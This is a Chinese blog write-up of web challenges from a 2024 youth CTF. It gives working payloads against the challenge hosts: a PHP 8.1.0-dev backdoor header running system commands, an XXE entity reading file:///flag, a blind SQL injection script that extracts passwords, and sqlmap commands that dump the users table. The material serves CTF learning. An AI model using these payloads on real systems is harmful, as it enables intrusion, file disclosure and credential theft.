3.1_2024ctf青少年比赛部分web题

已于 2024-03-02 08:40:14 修改
阅读量640 收藏 7
点赞数 3
分类专栏: CTF刷题记录 文章标签: 安全
于 2024-03-01 09:42:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74240553/article/details/136386366
版权

php后门

在这里插入图片描述
根据x-powered-by知道php的版本
该版本存在漏洞:
PHP 8.1.0-dev 开发版本后门

在这里插入图片描述

根据报错信息,进行提示,前

GET / HTTP/1.1
Host: challenge.qsnctf.com:31639
User-Agentt:12345678system('cat /flag');var_dump(2*3);zerodium12345678system('tac /flag');
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 2


成功执行tac /flag命令

理解原理来做就好
https://www.modb.pro/db/104464
这种文章只是演示类的,一般比赛都不会是原题直出的
https://blog.csdn.net/zy15667076526/article/details/116447864

EasyMD5

在这里插入图片描述

可以找到原题
参考文章:
https://blog.csdn.net/qq_74240553/article/details/135740695
使用工具fastcoll,生成两个相同md5的pdf文件
在这里插入图片描述

xxe漏洞

参考文章:
https://blog.csdn.net/qq_61553520/article/details/130655389

libxml版本是2.8.0,可能存在xml漏洞
在这里插入图片描述
这又是一道原题
https://blog.csdn.net/qq_74240553/article/details/135644491

在这里插入图片描述

POST /dom.php HTTP/1.1
Host: challenge.qsnctf.com:32592
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Origin: http://challenge.qsnctf.com:32592
Connection: close
Referer: http://challenge.qsnctf.com:32592/dom.php
Upgrade-Insecure-Requests: 1

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///flag" >]>
<root>
<name>&xxe;</name>
</root>

Easy_SQLi

在这里插入图片描述

在这里插入图片描述
确认存在注入
使用时间盲注,进行测试

import requests
import sys
import time

url = "http://challenge.qsnctf.com:31230/login.php"
flag = ""
for i in range(1,80):
    max = 127
    min = 32
    while 1:
        mid = (max+min)>>1
        if(min == mid):
            flag += chr(mid)
            print(flag)
            break
        #payload = "admin'and (ascii(substr((select database()),{},1))<{})#".format(i,mid)
        #qsnctf
        #payload = "admin'and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{})#".format(i,mid)
        #users
        #payload = "admin'and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),{},1))<{})#".format(i,mid)
        #USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password
        payload = "admin'and (ascii(substr((select group_concat(password) from users),{},1))<{})#".format(i,mid)

        data = {
            "uname":payload,
            "psw":0,
        }
        res = requests.post(url = url,data =data)
        time.sleep(0.3)
        if res.text.find("Invalid username or password")<0:
            max = mid
        else:
            min = mid

在这里插入图片描述
成功测试出flag

方法二:使用sqlmap一把梭

sqlmap -r 123.txt --tables
在这里插入图片描述
这里不知道为什么这里不可以用–current-db进行测试当前的数据库
但是上面的方法还是可以知道当前的数据库是有个叫qsnct的

sqlmap -r 123.txt -D qsnctf --tables
在这里插入图片描述
有个users表
查一下字段有什么
sqlmap -r 123.txt -D qsnctf -T users --columns
在这里插入图片描述
既然又password肯定要去看一下
在这里插入图片描述
脱数据
sqlmap -r 123.txt -D qsnctf -T users -C password --dump
在这里插入图片描述
这个就是flag,由于时间问题就没有放完了

time如~曦
关注
专栏目录
青少年CTF-Web-Easy PingMe攻略
小苏
11-30 967
分号字符,决定使用这个符号进行操作,经过这条命令可以得知本目录下还有一个文件名为【flag.php】,猜测flag就在该文件中,所以使用【1.1.1.1;这是因为他是php语言,且将flag赋值在了变量中,并没有将它进行输出!第二步:开始尝试注入,先测试是否会过滤一些字符之类的操作 这里以【1.1.1.1;见怪不怪了,尝试【CTRL+U】查看源代码看看是否有什么东西出现!end:遇到命令注入的可以尝试【;前言:根据目意思得知该目为命令执行【命令注入】第一步:启动靶场,然后打开链接查看原型。
LitCTF2024 郑州轻工业大学首届网络安全赛 WP 部分_[litctf 2024]vim yyds
2301_79054215的博客
04-13 1438
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。(img-UjorHS4E-1712969539868)]发现第一条凤凰网报道中提到了。
LitCTF2024WP
qq_67760645的博客
06-02 1083
LitCTF2024的解思路
LITCTF2024-6月web方向wp
Perterluck的博客
06-02 985
这个目考察XXE注入,这个从目就可看出来(翻转一下就可),了解一下XXE注入,主要了解XML格式和其中DOCTYPE还有主体ENTITY的定义,重点利用的是外部实体注入攻击,因为服务器会直接将xml传送的内容做引用,这样便可以通过一些伪协议找到flag。dict:// 字典服务器协议,访问字典资源,如,dict:///ip:6739/info:注意这个协议使用的前提是服务器的端口可以拿到,这个没啥好方法,除非直接告诉你否则就爆破吧。这个就是一个反序列化,没啥好说的,直接按照要求就可拿到flag。
Litctf2024 web部分
2301_78871310的博客
06-05 243
探姬杯还是挺适合我这种新手的,写了写部分wp,
[青少年CTF] easy_web 详解+避坑
明裕学长的博客
03-13 4816
这里坑就来了我们需要使用hackbar先进行一次post传递搭配burp抓包。希望小伙伴们可以一步一步的复现而不是直接填flag那样是没有效果滴!注意这里的回显结果不能出现md5 is funny ~发现它经过了两次base64编码和一次十六进制编码。我们反向操作一波查看index.php的源码。这里可以将img=删除因为我们已经绕过了。这里的%20是url编码是空格。下面在搭配../进行目录遍历。接着我们将post参数替换成。这让我联想到地址栏中的参数。下面我们进行了l\s绕过。解开后发现是图片源码。
20220117_2021CTF各比赛分享.zip
09-30
比赛项目代码
CTF信息安全比赛单项选择.docx
01-25
CTF信息安全比赛单项选择.
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
中山市香山杯 2021 CTF zip
12-07
中山市香山杯 2021 CTF zip
ctf入门库_「ctf比赛web安全CTF比赛(初级) - seo实验室
weixin_40001967的博客
12-22 2602
ctf比赛一、Robot访问URL,可以看到一张骚气十足的图片,然后就什么都没了。。。没了。。。不可能啊,一张骚图片就想欺骗小编,想的太美(长得丑了)目说明写的是robot,想想多半是有猫腻,想来也就是关于”robots.txt”了,上百度百科。好的,直接在URL后面加上robots.txt访问,哟呵,果然是成功了,佩服小编的聪明才智了。访问查看到的目录,很容易就发现“admin/3hell.p...
探姬杯LitCTF2024Web方向)
Zue3r的博客
06-02 833
探姬杯LitCTF2024Web方向)
CTF writeup 1_网络安全实验室
热门推荐
Troy
10-26 31万+
基础关1.key在哪里? 过关地址打开网址 “key就在这里中,你能找到他吗? ” 看看源代码有没有线索~果然<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> </head> <body> key就在这里中,你能找到他吗?
Bugku CTF 目解析 (1-10)
半夜好饿的博客
09-28 1万+
写在前面的话: 这里只是记录一些自己的解思路,或者一些有关解的乱七八糟的东西,自己是刚零基础接触这方面的东西,所以有表述不当的地方请包容,在此谢过! 1、web2 点开网址后: 解思路:F12 打开 开发者工具看看,可以看到需要寻找的flag。 将其复制到提交框即可。 flag: KEY{Web-2-bugKssNNikls9100} 2、计算器 点开网址后: 解思路:先提交答案...
从密码学看盲拍合约:智能合约的隐私与安全新革命!
Huahua_1223的博客
09-28 1236
随着区块链技术的发展,智能合约在各种场景中的应用越来越广泛。盲拍合约作为一种新兴的智能合约形式,利用密码学原理为参与者提供了隐私保护和安全保障。这种合约不仅增强了竞拍的公平性,还消除了时间压力,让参与者能够在更为放松的环境中进行投标。本文将深入探讨盲拍合约的定义、优势、工作原理以及代码实现,旨在为读者提供一个全面的理解。盲拍合约是一种智能合约,允许参与者在不公开其出价的情况下进行竞拍。参与者提交一个“盲出价”,其中包含出价金额、一个虚假的标记以及一个秘密值。
.888勒索病毒解密方法|勒索病毒解决|勒索病毒恢复|数据库修复
最新发布
数据恢复研究℃
10-01 828
引言在数字化时代,网络空间的威胁日益增多,其中勒索病毒已成为数据安全领域的一大挑战。近期,.888勒索病毒作为一种新型的恶意软件,正逐渐引起人们的广泛关注。本文将详细介绍.888勒索病毒的特点、如何恢复被其加密的数据文件,以及预防该病毒的有效策略。.888勒索病毒不断更新和变异的特点,是其能够持续威胁网络安全的重要因素。
【蚂蚁HR-注册/登录安全分析报告】
09-28 1288
蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站,主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市,目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化,创始人团队致力于通过程序和硬件替代所有可以自动化的环节,从而最大限度地减少人为错误,作为头部的社保代缴平台, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
什么是托管安全信息和事件管理 SIEM?
网络研究观
09-28 1922
SIEM 解决方案是组织网络安全基础设施的重要组成部分
六一战队夺魁青少年CTF擂台赛2024_round1:Web与Pwn解揭秘
青少年CTF擂台挑战赛2024第一轮(#round 1)是一项针对青少年的信息安全竞赛,参赛队伍sixone战队在本次比赛中取得了显著的成绩。比赛涵盖多种技术领域,包括Web应用安全Web1到Web5)、逆向工程(Reverse1)、密码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值